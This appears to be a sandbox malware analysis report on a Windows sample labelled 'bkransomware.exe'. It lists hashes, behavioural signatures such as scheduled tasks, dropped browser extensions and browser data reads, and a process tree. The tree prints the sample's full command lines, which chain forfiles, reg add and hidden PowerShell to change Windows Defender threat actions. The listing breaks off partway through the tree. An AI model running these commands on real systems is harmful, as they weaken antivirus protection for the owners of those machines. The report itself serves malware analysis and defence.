Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
24-05-2024 16:38
Static task
static1
Behavioral task
behavioral1
Sample
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
Resource
win7-20240221-en
General
-
Target
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
-
Size
6.7MB
-
MD5
f793b0bdfb3c06ba932dddffb5be9ad8
-
SHA1
b17c6d562c371f8140432354b4304ac4d03fe41f
-
SHA256
b9026fce43a810a6a6b216a2cf6d9a39e9cf265caac3b8c46de3a1bdef8a606d
-
SHA512
e587a085e39d6691b7ee55fda9581dd14fb175a619d5613a1370a5ae4bc661dfd8c6cbc82dbffb75787eb228778b88a8feddd1a9df83540ace73cbd15cf0d501
-
SSDEEP
196608:chjvlx3/aPRLJ5uuC49qd3rGC03XhzuxktD0:cdvb/wRLauu5GCWoxktD
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.EXEpid process 1216 powershell.exe 3716 powershell.EXE -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\manifest.json 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe -
Drops file in System32 directory 3 IoCs
Processes:
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Windows\system32\GroupPolicy\gpt.ini 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe -
Drops file in Program Files directory 14 IoCs
Processes:
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exedescription ioc process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpi 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\iBwvWTy.xml 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\WEPOREuymMJJC\pHZVDCF.dll 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\WEPOREuymMJJC\DycnJMJ.xml 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpi 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\EkAcBLsehYBU2\VNWMwgr.xml 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\EkAcBLsehYBU2\NcpbmrUiJGDNX.dll 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\LjPBjCkxU\cbriGN.dll 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\LjPBjCkxU\HNgTMFj.xml 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\nsdhLIM.dll 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\yyjtaGBLEqUn\rpprfmy.dll 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\RqexYqdylWmHLyb.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4220 3820 WerFault.exe 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4092 schtasks.exe 4864 schtasks.exe 5028 schtasks.exe 4880 schtasks.exe 1044 schtasks.exe 464 schtasks.exe 4064 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXE2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exepid process 1216 powershell.exe 1216 powershell.exe 1996 powershell.exe 1996 powershell.exe 2792 powershell.exe 2792 powershell.exe 3716 powershell.EXE 3716 powershell.EXE 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 3716 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exepowershell.exepowershell.execmd.exedescription pid process target process PID 3820 wrote to memory of 2800 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe cmd.exe PID 3820 wrote to memory of 2800 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe cmd.exe PID 3820 wrote to memory of 2800 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe cmd.exe PID 2800 wrote to memory of 2364 2800 cmd.exe forfiles.exe PID 2800 wrote to memory of 2364 2800 cmd.exe forfiles.exe PID 2800 wrote to memory of 2364 2800 cmd.exe forfiles.exe PID 2364 wrote to memory of 2564 2364 forfiles.exe cmd.exe PID 2364 wrote to memory of 2564 2364 forfiles.exe cmd.exe PID 2364 wrote to memory of 2564 2364 forfiles.exe cmd.exe PID 2564 wrote to memory of 3728 2564 cmd.exe reg.exe PID 2564 wrote to memory of 3728 2564 cmd.exe reg.exe PID 2564 wrote to memory of 3728 2564 cmd.exe reg.exe PID 2800 wrote to memory of 1676 2800 cmd.exe forfiles.exe PID 2800 wrote to memory of 1676 2800 cmd.exe forfiles.exe PID 2800 wrote to memory of 1676 2800 cmd.exe forfiles.exe PID 1676 wrote to memory of 4416 1676 forfiles.exe cmd.exe PID 1676 wrote to memory of 4416 1676 forfiles.exe cmd.exe PID 1676 wrote to memory of 4416 1676 forfiles.exe cmd.exe PID 4416 wrote to memory of 4520 4416 cmd.exe reg.exe PID 4416 wrote to memory of 4520 4416 cmd.exe reg.exe PID 4416 wrote to memory of 4520 4416 cmd.exe reg.exe PID 2800 wrote to memory of 4988 2800 cmd.exe forfiles.exe PID 2800 wrote to memory of 4988 2800 cmd.exe forfiles.exe PID 2800 wrote to memory of 4988 2800 cmd.exe forfiles.exe PID 4988 wrote to memory of 2968 4988 forfiles.exe cmd.exe PID 4988 wrote to memory of 2968 4988 forfiles.exe cmd.exe PID 4988 wrote to memory of 2968 4988 forfiles.exe cmd.exe PID 2968 wrote to memory of 2708 2968 cmd.exe reg.exe PID 2968 wrote to memory of 2708 2968 cmd.exe reg.exe PID 2968 wrote to memory of 2708 2968 cmd.exe reg.exe PID 2800 wrote to memory of 4260 2800 cmd.exe forfiles.exe PID 2800 wrote to memory of 4260 2800 cmd.exe forfiles.exe PID 2800 wrote to memory of 4260 2800 cmd.exe forfiles.exe PID 4260 wrote to memory of 5092 4260 forfiles.exe cmd.exe PID 4260 wrote to memory of 5092 4260 forfiles.exe cmd.exe PID 4260 wrote to memory of 5092 4260 forfiles.exe cmd.exe PID 5092 wrote to memory of 1964 5092 cmd.exe reg.exe PID 5092 wrote to memory of 1964 5092 cmd.exe reg.exe PID 5092 wrote to memory of 1964 5092 cmd.exe reg.exe PID 2800 wrote to memory of 3216 2800 cmd.exe forfiles.exe PID 2800 wrote to memory of 3216 2800 cmd.exe forfiles.exe PID 2800 wrote to memory of 3216 2800 cmd.exe forfiles.exe PID 3216 wrote to memory of 4020 3216 forfiles.exe cmd.exe PID 3216 wrote to memory of 4020 3216 forfiles.exe cmd.exe PID 3216 wrote to memory of 4020 3216 forfiles.exe cmd.exe PID 4020 wrote to memory of 1216 4020 cmd.exe powershell.exe PID 4020 wrote to memory of 1216 4020 cmd.exe powershell.exe PID 4020 wrote to memory of 1216 4020 cmd.exe powershell.exe PID 1216 wrote to memory of 3228 1216 powershell.exe gpupdate.exe PID 1216 wrote to memory of 3228 1216 powershell.exe gpupdate.exe PID 1216 wrote to memory of 3228 1216 powershell.exe gpupdate.exe PID 3820 wrote to memory of 1996 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe powershell.exe PID 3820 wrote to memory of 1996 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe powershell.exe PID 3820 wrote to memory of 1996 3820 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe powershell.exe PID 1996 wrote to memory of 3272 1996 powershell.exe cmd.exe PID 1996 wrote to memory of 3272 1996 powershell.exe cmd.exe PID 1996 wrote to memory of 3272 1996 powershell.exe cmd.exe PID 3272 wrote to memory of 3716 3272 cmd.exe reg.exe PID 3272 wrote to memory of 3716 3272 cmd.exe reg.exe PID 3272 wrote to memory of 3716 3272 cmd.exe reg.exe PID 1996 wrote to memory of 2680 1996 powershell.exe reg.exe PID 1996 wrote to memory of 2680 1996 powershell.exe reg.exe PID 1996 wrote to memory of 2680 1996 powershell.exe reg.exe PID 1996 wrote to memory of 4352 1996 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe"1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
